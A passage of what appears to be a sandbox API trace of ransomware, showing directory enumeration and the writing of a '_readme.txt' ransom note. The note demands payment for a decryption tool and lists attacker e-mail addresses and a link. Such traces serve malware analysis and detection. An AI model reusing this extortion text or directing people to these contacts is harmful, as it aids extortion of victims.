nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.661] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4b30a0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4b30a0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4b30a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.661] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.661] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.663] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0173.663] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.663] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.663] PathFindFileNameW (pszPath="") returned="" [0173.663] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.664] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.664] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.664] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.664] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0173.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.664] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0173.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.664] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.664] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.664] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.665] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.665] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.666] CloseHandle (hObject=0x690) returned 1 [0173.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.666] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4d9200, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4d9200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.666] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4d9200, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4d9200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.666] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.667] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4d9200, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4d9200, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4d9200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.667] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4d9200, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4d9200, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4d9200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.667] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.667] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: 